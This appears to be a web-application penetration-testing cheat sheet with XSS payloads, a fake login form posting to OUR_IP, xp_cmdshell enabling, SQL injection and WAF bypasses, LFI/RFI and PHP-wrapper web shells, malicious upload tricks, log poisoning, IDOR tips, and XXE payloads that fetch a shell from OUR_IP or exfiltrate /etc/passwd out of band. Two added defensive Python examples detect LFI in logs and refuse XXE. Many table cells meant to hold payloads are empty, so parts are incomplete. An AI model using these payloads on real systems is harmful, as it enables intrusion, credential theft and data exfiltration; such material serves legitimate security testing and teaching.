Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
| Code | Description |
|---|---|
| | Basic XSS Payload |
| | HTML-based XSS Payload |
| | Change Background Color |
| | Change Background Image |
| | Change Website Title |
| | Overwrite website's main body |
| | Remove certain HTML element |
| | Load remote script |
| | Send Cookie details to us |
| | Load remote ini file via iframe tag |
| | Login Form Injection |
| `curl -isk "https://site.com"` | Test for status of Content Security Policy (inspect the response headers) |
Serve XSS payload from an XML file
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
```
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Test the vulnerable form for the remove function by running the following script in the browser console (Dev Tools):
```javascript
document.getElementById('urlform').remove();
```
Step 2: Inject a form into the webpage with the XSS payload by executing the script below in the console (Dev Tools):
```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```
After successfully authenticating to a SQL Server, it is worth checking whether xp_cmdshell has already been enabled:
```sql
EXEC xp_cmdshell 'net user';
```
If xp_cmdshell is not enabled, run the commands below to enable it and execute Windows command-shell (cmd) commands from within SQL:
```sql
-- Enable advanced options so that xp_cmdshell can be configured
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
-- List the current configuration values
sp_configure;
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```
Basic SQL Testing
| Command | Description |
|---|---|
| | Select data from database |
| | Specify table to retrieve data |
| | Filter query to match a given condition |
| | Add single row to table |
| | Used to Create a TABLE, DATABASE, INDEX or VIEW |
| | Add/Remove columns from a table |
| | Update table data |
| | Delete rows from table |
| | Used to rename column/table with alias |
| | Combine rows from 2 or more tables |
| | Combine query conditions (must meet all conditions) |
| | Combine query conditions (only one must be met) |
| | Limit the amount of rows returned |
| | Specify multiple values (only used with WHERE) |
| | Return value on a specified condition |
| | Return only rows with a NULL value |
| | Search for pattern in a column |
| | Write a transaction to the database |
| | Undo a transaction |
| | Delete TABLE, DATABASE or INDEX |
| | Group data into logical sets |
| | Set order of results |
| | Functions like WHERE but filters groups |
| | Count rows |
| | Return a sum of a column |
| | Return average of a column |
| | Return min value of a column |
| | Return max value of a column |
MySQL Basics
| Command | Description |
|---|---|
| General | |
| | Login to MySQL database |
| | List available databases |
| | Switch to database |
| Tables | |
| | Add a new table |
| | List available tables in current database |
| | Show table properties and columns |
| | Add values to table |
| | Add values to specific columns in a table |
| | Update table values |
| Columns | |
| | Show all columns in a table |
| | Show specific columns in a table |
| | Delete a table |
| | Add new column |
| | Rename column |
| | Change column datatype |
| | Delete column |
| Output | |
| | Sort by column |
| | Sort by column in descending order |
| | Sort by two columns |
| | Only show first two results |
| | Only show first two results starting from index 2 |
| | List results that meet a condition |
| | List results where the name is similar to a given string |
MySQL Operator Precedence (highest to lowest)
Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)
SQL Injection
| Payload | Description |
|---|---|
| Auth Bypass | |
| | Basic Auth Bypass |
| | Basic Auth Bypass With comments |
| Union Injection | |
| | Detect number of columns using |
| | Detect number of columns using Union injection |
| | Basic Union injection |
| | Union injection for 4 columns |
| DB Enumeration | |
| | Fingerprint MySQL with query output |
| | Fingerprint MySQL with no output |
| | Current database name |
| | List all databases |
| | List all tables in a specific database |
| | List all columns in a specific table |
| | Dump data from a table in another database |
| Privileges | |
| | Find current user |
| | Find if user has admin privileges |
| | Find all user privileges |
| | Find which directories can be accessed through MySQL |
| File Injection | |
| | Read local file |
| | Write a string to a local file |
| | Write a web shell into the base web directory |
NoSQL Basics
| Command | Description |
|---|---|
| | List all the databases present |
| | Switch to database named "user_creds" |
| | List out the collections in a database |
| | Dump the contents of the documents present in the flag collection |
| | Basic NoSQLi Login |
SQLmap
| Command | Description |
|---|---|
| | View the basic help menu |
| | View the advanced help menu |
| | Run |
| | POST request specifying an injection point with an asterisk |
| | Passing an HTTP request file to |
| | Specifying a cookie header |
| | Specifying a PUT request |
| | Store traffic to an output file |
| | Specify verbosity level |
| | Specifying a prefix or suffix |
| | Specifying the level and risk |
| | Basic DB enumeration |
| | Table enumeration |
| | Table/row enumeration |
| | Conditional enumeration |
| | Database schema enumeration |
| | Searching for data |
| | Password enumeration and cracking |
| | Anti-CSRF token bypass |
| | List all tamper scripts |
| | Check for DBA privileges |
| | Reading a local file |
| | Writing a file |
| | Spawning an OS shell |
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI workaround PoC
LFI via this path does not work at first:
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing characters with the ? wildcard, you may receive a successful response (200):
/fileRead.jsp?fileName=/?tc/?asswd (200)
/fileRead.jsp?fileName=/??c/??sswd (200)
Fuzzing Parameters
# ffuf
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
Basic Bypasses
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
PHP Filters
php://filter/read=convert.base64-encode/resource=config
PHP Wrappers
Data Wrapper
The data wrapper can only be used if the allow_url_include setting is enabled in the PHP configuration.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_include Enabled
grep allow_url_include /etc/php/X.Y/apache2/php.ini
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
The target must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting.
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check whether the expect extension is enabled
grep expect /etc/php/X.Y/apache2/php.ini
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Remote File Inclusion (RFI)
# Verify RFI
cat php.ini | grep allow_url_include
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
LFI & File Uploads
Image Upload
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
ZIP Upload
# Create Malicious ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
PHAR Upload
# Create Malicious PHP File
## shell.php
```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
```
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>
# Poison Log
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2/access.log&cmd=id
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
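Defender-side counterpart to the LFI, wrapper and log-poisoning material above: an added detection script (not from the original page) that flags inclusion attempts in Apache combined-format access-log lines on the parameter names listed above. The log lines are constructed, and `language` is added to the parameter set because the wrapper examples use it.

```python
# Added detection example (not from the original page): flag LFI, wrapper and
# log-poisoning attempts in Apache combined-log lines. Log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names from the "File Inclusion Parameters" list, plus ?language=
INCLUDE_PARAMS = {"cat", "dir", "action", "board", "date", "detail", "file", "download",
                  "path", "folder", "prefix", "include", "page", "inc", "locate", "show",
                  "doc", "site", "type", "view", "content", "document", "layout", "mod",
                  "conf", "language"}
# Patterns taken from the LFI, bypass and wrapper payloads above
SIGNATURES = [
    ("traversal", re.compile(r"\.\.[/\\]")),          # also matches the ....// form
    ("null_byte", re.compile(r"\x00")),
    ("php_wrapper", re.compile(r"^(php|data|expect|zip|phar)://", re.I)),
    ("sensitive_path", re.compile(r"/etc/passwd|/var/log/|/var/lib/php/sessions", re.I)),
    ("php_tag", re.compile(r"<\?php", re.I)),
]
# Request line, status, size, referer and an escape-aware User-Agent field
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3} \d+ "[^"]*" '
                    r'"(?P<ua>(?:[^"\\]|\\.)*)"')


def classify(line: str) -> list:
    """Return the sorted signature names that fire on one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    hits = set()
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        decoded = unquote(value)        # second decode catches %252e%252e%252f style
        for label, rx in SIGNATURES:
            if rx.search(decoded):
                hits.add(label)
    if SIGNATURES[-1][1].search(m.group("ua")):   # log-poisoning precursor
        hits.add("ua_php_tag")
    return sorted(hits)


LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=....//....//etc/passwd%00 HTTP/1.1" 200 90 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 3000 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "<?php system($_GET[\\"cmd\\"]); ?>"',
]
```

Run `classify` over each line of a real access log and alert on any non-empty result; the `ua_php_tag` hit is the one to catch before the log file is ever included.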
IDOR Testing
Find and replace IDs in URLs, headers and body: /users/01 => /users/02
Try parameter pollution: users=01 => users=01&users=02
Special characters: /users/01* or /users/* => disclosure of every single user
Try older versions of API endpoints: /api/v3/users/01 => /api/v1/users/02
Add an extension: /users/01 => /users/02.json
Change request methods: POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS, etc.
Check if the Referer or other headers are used to validate IDs
Encrypted IDs: if the application uses encrypted IDs, try to decrypt them using a hashing/cracking tool
Send a wildcard: {"user_id":"*"}
Send the ID twice: URL?id=&id=
JSON wrap: {"id":111} --> {"id":{"id":111}}
Wrap the ID in an array: {"id":111} --> {"id":[111]}
Swap a GUID with a numeric ID or email: /users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX => /users/02 or /users/a@b.com
Try GUIDs such as 00000000-0000-0000-000000000000 and 11111111-1111-1111-111111111111
GUID enumeration: try to disclose GUIDs using Google Dorks, GitHub, Wayback, Burp history
If none of the GUID enumeration methods work, try SignUp, Reset Password and other endpoints and analyze the responses; an endpoint may disclose a user's GUID within the application.
When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: look for endpoints/features that may disclose information
Chain IDOR with XSS for account takeovers
Send a POST request with the path to the XML file for exploitation:
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
Or use a script to send the payload (curl.sh):
```bash
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
```
ID.xml
```xml
<?xml version="1.0"?>
<!--ID command example-->
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
```
Read robots.txt (Base64)
```xml
<?xml version="1.0"?>
<!--Base64 response example-->
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://vulnerablesite.com/robots.txt" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
```
Local File Disclosure
```xml
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
```
```xml
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```
RCE
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
```xml
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
```
Advanced File Disclosure
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
```xml
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
```
Error Based XXE
# DTD File
```xml
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
```
# Upload XXE
```xml
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
```
Blind Data Exfiltration
Out of Band Data Exfiltration
# DTD File
```xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```
# PHP Server Setup
```php
<?php
// Decode the base64 content sent by the parser and write it to the error log
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>
```
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
```
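Defensive counterpart to the XXE payloads in this section, as an added example that is not part of the original page: every variant above (expect://, file:///, php://filter, the out-of-band xxe.dtd, the error-based trick) needs a DOCTYPE with entity declarations, so an application that parses untrusted XML can refuse those features outright. The parser below uses Python's stdlib expat bindings; the sample documents are constructed here.

```python
# Added defensive example (not from the original page): parse untrusted XML with
# expat while refusing the DTD/entity features every XXE payload above relies on.
import xml.parsers.expat

class UnsafeXML(ValueError):
    """Raised when a document uses a DOCTYPE, entity declaration or external entity."""

def parse_untrusted_xml(data: bytes) -> dict:
    """Return {child_element: text} for the root's direct children, or raise UnsafeXML."""
    parser = xml.parsers.expat.ParserCreate()
    result, path, text = {}, [], []
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Blocks internal subsets and external DTDs (the out-of-band xxe.dtd) alike
        raise UnsafeXML("DOCTYPE declarations are not accepted")
    def reject_entity(*_):
        raise UnsafeXML("entity declarations are not accepted")
    def reject_external(*_):
        return 0  # returning 0 makes expat abort instead of fetching the URI
    def start(name, attrs):
        path.append(name)
        text.clear()
    def end(name):
        if len(path) == 2:  # direct child of the root element
            result[name] = "".join(text).strip()
        path.pop()
        text.clear()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML rejected: {exc}") from exc
    return result

def accepts(data: bytes) -> bool:
    """True when the document parses cleanly, False when it was rejected."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXML:
        return False

# Constructed samples: a benign entry and the page's expect:// XXE shape
BENIGN = b'<?xml version="1.0"?><entry><subject>Hi</subject><category>Clothing</category></entry>'
XXE = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
       b'<!ENTITY xxe SYSTEM "expect://id">]><entry><subject>&xxe;</subject></entry>')
```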